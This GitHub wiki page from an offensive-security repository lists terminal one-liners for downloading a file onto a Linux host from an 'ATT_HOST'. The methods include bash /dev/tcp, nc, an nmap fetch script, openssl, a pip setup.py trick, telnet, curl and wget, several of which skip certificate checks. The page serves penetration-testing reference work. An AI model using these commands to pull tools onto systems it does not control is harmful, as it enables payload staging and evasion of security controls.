DL_ _Lin_ _Terminal - lighthouseitsecurity/barabbas GitHub Wiki

File Download ➔ Linux ➔ Terminal

OVERVIEW:

(identify supported options - Linux - file download - terminal)

tools=("bash" "curl" "lwp-download" "nc" "nc.traditional" "nmap" "openssl" "pip" "*telnet" "wget"); echo '[*] teminal - file download - available options'; for tool in ${tools[@]}; do echo "   [*] $tool"; find /etc /bin /usr/bin /usr/lib /usr/sbin /usr/local/bin /usr/local/lib /usr/local/sbin /opt -type f -executable -name "$tool" 2>/dev/null; echo ''; done;

bash (HTTP)

https://www.gnu.org/software/bash/

TESTED ON: Kali 2023.2

(HTTP)

1. [CLIENT] open terminal session

(open terminal window)

2. [CLIENT] specify file transfer parameters

export ATT_HOST=192.168.5.11;
export ATT_PORT=80;
export ATT_PATH=/;
export RFILE=testfile_200MB;

3. [CLIENT] download file

bash -c '{ echo -ne "GET $ATT_PATH$RFILE HTTP/1.0\r\nHost: $ATT_HOST:$ATT_PORT\r\n\r\n" 1>&3; cat 0<&3; } 3<>/dev/tcp/$ATT_HOST/$ATT_PORT | { while read -r; do [ "$REPLY" = "$(echo -ne "\r")" ] && break; done; cat; } > $PWD/$RFILE'; md5sum $PWD/$RFILE;

NOTE: not working with HTTP/1.1

curl (HTTP; HTTPS)

https://linux.die.net/man/1/curl

TESTED ON: Kali 2023.2

(HTTP)

1. [CLIENT] open terminal session

(open terminal window)

2. [CLIENT] specify file transfer parameters

export ATT_HOST=192.168.5.11;
export ATT_PORT=80;
export ATT_PATH=/;
export RFILE=testfile_200MB;

3. [CLIENT] download file

curl http://$ATT_HOST:$ATT_PORT$ATT_PATH$RFILE -o $PWD/$RFILE; md5sum $PWD/$RFILE;

(HTTPS)

1. [CLIENT] open terminal session

(open terminal window)

2. [CLIENT] specify file transfer parameters

export ATT_HOST=192.168.5.11;
export ATT_PORT=443;
export ATT_PATH=/;
export RFILE=testfile_200MB;

3. [CLIENT] download file

curl -k https://$ATT_HOST:$ATT_PORT$ATT_PATH$RFILE -o $PWD/$RFILE; md5sum $PWD/$RFILE;

NOTE: -k disables X.509 certificate validation

lwp-download (HTTP)

https://linux.die.net/man/1/lwp-download

TESTED ON: Kali 2023.2

(HTTP)

1. [CLIENT] open terminal session

(open terminal window)

2. [CLIENT] specify file transfer parameters

export ATT_HOST=192.168.5.11;
export ATT_PORT=80;
export ATT_PATH=/;
export RFILE=testfile_200MB;

3. [CLIENT] download file

lwp-download http://$ATT_HOST:$ATT_PORT$ATT_PATH$RFILE $PWD/$RFILE; md5sum $PWD/$RFILE;

nc/nc.traditional (HTTP)

https://linux.die.net/man/1/nc

TESTED ON: Kali 2023.2

(HTTP)

1. [CLIENT] open terminal session

(open terminal window)

2. [CLIENT] specify file transfer parameters

export ATT_HOST=192.168.5.11;
export ATT_PORT=80;
export ATT_PATH=/;
export RFILE=testfile_200MB;

3. [CLIENT] download file

(nc)

echo -e "GET $ATT_PATH$RFILE HTTP/1.1\r\nHost: $ATT_HOST:$ATT_PORT\r\n\r\n" | nc $ATT_HOST $ATT_PORT | tail -n +8 > $PWD/$RFILE; md5sum $PWD/$RFILE;

(nc.traditional)

echo -e "GET $ATT_PATH$RFILE HTTP/1.1\r\nHost: $ATT_HOST:$ATT_PORT\r\n\r\n" | nc.traditional $ATT_HOST $ATT_PORT | tail -n +8 > $PWD/$RFILE; md5sum $PWD/$RFILE;

nmap (HTTP/HTTPS)

https://linux.die.net/man/1/nmap

TESTED ON: Kali 2023.2

(HTTP)

1. [CLIENT] open terminal session

(open terminal window)

2. [CLIENT] specify file transfer parameters

export ATT_HOST=192.168.5.11;
export ATT_PORT=80;
export ATT_PATH=/;
export RFILE=testfile_1MB;

3. [CLIENT] download file

TF=$(mktemp -d);
nmap -p $ATT_PORT $ATT_HOST --script http-fetch --script-args http-fetch.destination=$TF,http-fetch.url=$RFILE;

4. [CLIENT] move file to current directory

tmp_dl_file=$(find /tmp -type f -name "$RFILE" 2>/dev/null | grep '/tmp/tmp\.' | grep "$RFILE"); tmp_dl_dir=$(echo $tmp_dl_file | head -c 20); mv $tmp_dl_file $PWD/$RFILE; md5sum $PWD/$RFILE; rm -rf $tmp_dl_dir;

(HTTPS)

1. [CLIENT] open terminal session

(open terminal window)

2. [CLIENT] specify file transfer parameters

export ATT_HOST=192.168.5.11;
export ATT_PORT=443;
export ATT_PATH=/;
export RFILE=testfile_1MB;

3. [CLIENT] download file

TF=$(mktemp -d);
nmap -p $ATT_PORT $ATT_HOST --script http-fetch --script-args http-fetch.destination=$TF,http-fetch.url=$RFILE;

NOTE: works with self-signed X.509 certificates

4. [CLIENT] move file to current directory

tmp_dl_file=$(find /tmp -type f -name "$RFILE" 2>/dev/null | grep '/tmp/tmp\.' | grep "$RFILE"); tmp_dl_dir=$(echo $tmp_dl_file | head -c 20); mv $tmp_dl_file $PWD/$RFILE; md5sum $PWD/$RFILE; rm -rf $tmp_dl_dir;

openssl (HTTPS)

https://linux.die.net/man/1/openssl

TESTED ON: Kali 2023.2

(HTTPS)

1. [CLIENT] open terminal session

(open terminal window)

2. [CLIENT] specify file transfer parameters

export ATT_HOST=192.168.5.11;
export ATT_PORT=443;
export ATT_PATH=/;
export RFILE=testfile_200MB;

3. [CLIENT] download file

echo -e "GET $ATT_PATH$RFILE HTTP/1.1\r\nHost: $ATT_HOST:$ATT_PORT\r\n\r\n" | openssl s_client -quiet -connect $ATT_HOST:$ATT_PORT | tail -n +8 > $PWD/$RFILE; md5sum $PWD/$RFILE;

NOTES:

  • works with self-signed X.509 certificates
  • upon download, an error will appear in stdout, which can be ignored (i.e. file successfully downloaded)

pip (HTTP)

https://pip.pypa.io/en/stable/cli/pip_install/

TESTED ON: Kali 2023.2

(HTTP)

1. [CLIENT] open terminal session

(open terminal window)

2. [CLIENT] specify file transfer parameters

export ATT_HOST=192.168.5.11;
export ATT_PORT=80;
export ATT_PATH=/;
export RFILE=testfile_200MB;

3. [CLIENT] download file

export URL=http://$ATT_HOST:$ATT_PORT$ATT_PATH$RFILE;
TF=$(mktemp -d);
echo 'import sys; from os import environ as e
if sys.version_info.major == 3: import urllib.request as r
else: import urllib as r
r.urlretrieve(e["URL"], e["RFILE"])' > $TF/setup.py;
pip install $TF;

4. [CLIENT] move file to current directory

tmp_dl_dir=$(find /tmp -type f -name "setup.py" 2>/dev/null | grep '/tmp/tmp\.' | head -c -10); mv $tmp_dl_dir/$RFILE $PWD/$RFILE; md5sum $PWD/$RFILE; rm -rf $tmp_dl_dir;

NOTE: upon download, an error will appear in stdout, which can be ignored (i.e. file successfully downloaded)

  • file downloaded in two locations in /tmp

telnet (HTTP)

https://linux.die.net/man/1/telnet

TESTED ON: Kali 2023.2

(HTTP)

1. [SERVER] base64-encode target file

export LFILE="testfile_200MB";
cat $LFILE | base64 -w0 > ${LFILE}.b64;

2. [CLIENT] open terminal session

(open terminal window)

3. [CLIENT] specify file transfer parameters

export ATT_HOST=192.168.5.11;
export ATT_PORT=80;
export ATT_PATH=/;
export RFILE=testfile_200MB;

4. [CLIENT] download base64-encoded file

{ sleep 3; echo -e "GET $ATT_PATH$RFILE.b64 HTTP/1.1\nHost: $ATT_HOST:$ATT_PORT\n\n"; sleep 3 } | telnet $ATT_HOST $ATT_PORT | tail -n 1 > "$PWD/$RFILE.b64";

NOTES:

  • base64-encoding taget file, due to bash issues (null byte transmission)
  • adjust sleep timers, if needed (depending on environment and file size)

5. [CLIENT] base64-decode file

cat $PWD/$RFILE.b64 | base64 -d $PWD/$RFILE; rm $PWD/$RFILE.b64; md5sum $PWD/$RFILE;

wget (HTTP; HTTPS)

https://linux.die.net/man/1/wget

TESTED ON: Kali 2023.2

(HTTP)

1. [CLIENT] open terminal session

(open terminal window)

2. [CLIENT] specify file transfer parameters

export ATT_HOST=192.168.5.11;
export ATT_PORT=80;
export ATT_PATH=/;
export RFILE=testfile_200MB;

3. [CLIENT] download file

wget http://$ATT_HOST:$ATT_PORT$ATT_PATH$RFILE -O $PWD/$RFILE; md5sum $PWD/$RFILE;

(HTTPS)

1. [CLIENT] open terminal session

(open terminal window)

2. [CLIENT] specify file transfer parameters

export ATT_HOST=192.168.5.11;
export ATT_PORT=443;
export ATT_PATH=/;
export RFILE=testfile_200MB;

3. [CLIENT] download file

wget --no-check-certificate https://$ATT_HOST:$ATT_PORT$ATT_PATH$RFILE -O $PWD/$RFILE; md5sum $PWD/$RFILE;
⚠️ **GitHub.com Fallback** ⚠️